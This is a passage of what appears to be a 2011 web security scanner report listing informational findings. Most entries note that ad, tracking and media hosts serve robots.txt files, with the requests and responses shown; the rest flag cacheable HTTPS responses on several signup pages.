P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 07 Sep 2011 20:02:01 GMT
Accept-Ranges: bytes
Content-Length: 82
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private

User-agent: *
Disallow: /search
Disallow: /bin
Disallow: /language
Disallow: /yhs

23.88. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:38:57 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.89. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

23.90. http://servedby.flashtalking.com/imp/3/16718  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16718

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 17:09:15 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
content-type: text/plain
Age: 27767
Via: 1.0 mdw061001 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 78
Connection: close

# Do not crawl
User-agent: *
Disallow: /


23.91. http://site.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://site.abc.go.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: site.abc.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 136
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Accept-Ranges: bytes
ETag: "80371b9281cc1:199e2"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:07:12 GMT
Date: Sat, 17 Sep 2011 01:03:08 GMT
Connection: close
X-UA-Compatible: IE=EmulateIE7

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.92. http://spe.atdmt.com/ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Thu, 22 Sep 2011 18:34:23 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

23.93. http://static-gallery.pictopia.com.edgesuite.net/providerasset/1081/bherald_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static-gallery.pictopia.com.edgesuite.net
Path:   /providerasset/1081/bherald_style.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static-gallery.pictopia.com.edgesuite.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 22:20:31 GMT
ETag: "208049b-4a-4a05b846c49c0"-gzip
Content-Type: text/plain
Vary: User-Agent
Cache-Control: max-age=69186
Expires: Sat, 17 Sep 2011 20:50:43 GMT
Date: Sat, 17 Sep 2011 01:37:37 GMT
Content-Length: 74
Connection: close

User-agent: discobot
Disallow: /

User-agent: *
Disallow:
Crawl-delay: 5

23.94. http://stats.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kaltura.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stats.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
ETag: "106d8a-3f-4ac1e793ed580"
X-Me: ny-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 17 Sep 2011 00:52:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:52:11 GMT
Content-Length: 63
Connection: close

User-agent: *
Disallow: /content/
Disallow: /p/*/serveFlavor/


23.95. http://traffic.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /network/redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sat, 17 Sep 2011 01:00:14 GMT
Connection: close

User-agent: *
Disallow: /


23.96. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Impression/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trk.vindicosuite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:05:16 GMT
ETag: "3bab9858bc52cc1:0"
Last-Modified: Thu, 04 Aug 2011 15:36:58 GMT
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-e597718b
Content-Length: 139
Connection: Close

# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism


User-agent: *
Disallow: /

23.97. http://us.adserver.yahoo.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

23.98. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usadmm.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:37 GMT
Server: Apache/2.2.20 (Unix) DAV/2
X-Name: dmm-s01
Last-Modified: Fri, 11 Sep 2009 22:34:40 GMT
ETag: "a80dd10f-a2-47354ebf52000"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

23.99. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "19514c-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www400
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.100. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wls.wireless.att.com

Response

HTTP/1.1 200 OK
Content-Length: 278
Content-Type: text/plain
Last-Modified: Mon, 27 Jul 2009 18:54:56 GMT
Accept-Ranges: bytes
ETag: "52a85bcebeca1:c94"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:55 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2007 WebTrends Inc. All rights reserved.
# $DateTime: 2007/02/02 09:50:38 $
#
#####################
...[SNIP]...

23.101. http://www.4info.com/js/auto_jump.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4info.com
Path:   /js/auto_jump.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4info.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 Mar 2009 22:15:33 GMT
ETag: "639384-18-464df34ca4b40"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.102. http://www.att.com/u-verse/availability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /u-verse/availability/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 01 Sep 2011 20:16:52 GMT
ETag: "356f72-660-ece37500"
Accept-Ranges: bytes
Content-Length: 1632
P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:51:53 GMT
Connection: close

User-agent: *
Disallow: /Common/indc/popup/
Disallow: /Common/popup/
Disallow: /Large-Files/
Disallow: /Uverse/files/
Disallow: /dsl/shop/fragments/
Disallow: /esupport/article/articleEmail.jsp
...[SNIP]...

23.103. http://www.bostonherald.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:14 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 20:58:03 GMT
Accept-Ranges: bytes
Content-Length: 570
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close

Robots.txt
# Modified 06/16/2006 by Bill Gaffney
# Herald Interactive Media


User-agent: msnbot
Crawl-delay: 120

User-agent: Slurp
Crawl-delay: 15

User-agent: *
Disallow: /audio
Disal
...[SNIP]...

23.104. http://www.bradsdeals.com/dealsoftheday/subscribe/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bradsdeals.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 Mar 2011 18:23:51 GMT
Accept-Ranges: bytes
ETag: "d0bde2fa6d9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:44 GMT
Connection: close
Content-Length: 580

User-agent: *
Disallow: /rss.cfm
Disallow: /api/
Disallow: /go/
Disallow: /go/m/
Disallow: /go/c/
Disallow: /go/p/
Disallow: /update/
Disallow: /logs/
Disallow: /ddj/
Disallow: /cfdo
...[SNIP]...

23.105. http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   /index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaltura.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:03 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
ETag: "10a13e-3f-4ac1e793ed580"
Accept-Ranges: bytes
Content-Length: 63
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /content/
Disallow: /p/*/serveFlavor/


23.106. http://www.meebo.com/cim/sandbox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cim/sandbox.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.107. http://www.tmz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:56 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:51:56 GMT
Set-Cookie: phpsessionid=qn8pimpuuj74tb87b4c5d8a1d4; expires=Sun, 20-Feb-2028 00:51:56 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 1000
Connection: close
Content-Type: text/plain; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private


User-agent: *
Disallow: /*?action=print
Disallow: */third_rail_rework
Disallow: */digitalsmiths_demo_environment
Disallow: */video_demo
Disallow: */tmz_dev_demo
Disallow: */test_page
Disallow: */test
...[SNIP]...

24. Cacheable HTTPS response  previous  next
There are 13 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


24.1. https://admin.usenetbinaries.com/cgi-bin/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.usenetbinaries.com
Path:   /cgi-bin/signup

Request

GET /cgi-bin/signup?package=pro HTTP/1.1
Host: admin.usenetbinaries.com
Connection: keep-alive
Referer: http://www.usenetbinaries.com/l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>
Usenet Binaries Dot Com - New Account Secure Signup
</title>
<meta name="keyw
...[SNIP]...

24.2. https://admin.usenetbinaries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.usenetbinaries.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: admin.usenetbinaries.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:49 GMT
Server: Apache
Last-Modified: Sat, 05 Jan 2008 00:47:59 GMT
ETag: "93988b-47e-fa7d2dc0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................@@@.....sss.................@@...... ......................www.........DDD.....................ww..""......................DD
...[SNIP]...

24.3. https://www.easynews.com/signup/lookit.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.easynews.com
Path:   /signup/lookit.phtml

Request

POST /signup/lookit.phtml HTTP/1.1
Host: www.easynews.com
Connection: keep-alive
Referer: https://www.easynews.com/signup/?accounttype=20&linktype=trialbuttontophome
Content-Length: 39
Origin: https://www.easynews.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer9=4eae35f1b34eae35f1b30a654ca39c; __utmx=40324861.; __utmxx=40324861.; __utma=63532859.1552519903.1316219542.1316219542.1316219542.1; __utmb=63532859.1.10.1316219542; __utmc=63532859; __utmz=63532859.1316219542.1.1.utmgclid=CJzUx83AoqsCFRdlgwod-2urfQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server; PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx

cu=&sp=1b2ee5e1225581be36ba95ef9c06dbf4

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:35:41 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=45, max=300
Connection: Keep-Alive
Content-Type: text/html

3|0

24.4. https://www.giganews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:29 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 30 May 2005 18:07:36 GMT
ETag: "26996a-57e-3f856c3346a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 1406
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

..............h.......(....... ...............................@`... ......@@...............`..............@ ..........@`... ...@......@...@@..p...H... ........x...p...d...\...T...L...H...4h...........
...[SNIP]...

24.5. https://www.giganews.com/images/fonts/museo_slab_500-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /images/fonts/museo_slab_500-webfont.woff

Request

GET /images/fonts/museo_slab_500-webfont.woff HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:19 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 15 Dec 2010 22:21:30 GMT
Accept-Ranges: bytes
Content-Length: 29348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-woff

wOFF......r.................................FFTM...l........Y$k.GDEF.......#...&....OS/2.......S...`....cmap................cvt .......N...N.
.Tfpgm...........e../.gasp................glyf......eO....
...[SNIP]...

24.6. https://www.giganews.com/images/fonts/museo_slab_500italic-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /images/fonts/museo_slab_500italic-webfont.woff

Request

GET /images/fonts/museo_slab_500italic-webfont.woff HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:19 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 15 Dec 2010 22:21:30 GMT
Accept-Ranges: bytes
Content-Length: 31712
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-woff

wOFF......{.................................FFTM...l........Y$l.GDEF.......#...&....OS/2.......S...`...5cmap................cvt .......N...N...mfpgm...........e../.gasp................glyf......ni....
...[SNIP]...

24.7. https://www.giganews.com/images/fonts/museosans_500-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /images/fonts/museosans_500-webfont.woff

Request

GET /images/fonts/museosans_500-webfont.woff HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:19 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 15 Dec 2010 22:21:30 GMT
Accept-Ranges: bytes
Content-Length: 27008
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-woff

wOFF......i.................................FFTM...l........Y$k.GDEF.......#...&....OS/2.......S...`...4cmap................cvt .......J...JL..fpgm...........e../.gasp................glyf......\0...,
...[SNIP]...

24.8. https://www.mailjet.com/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mailjet.com
Path:   /signup

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
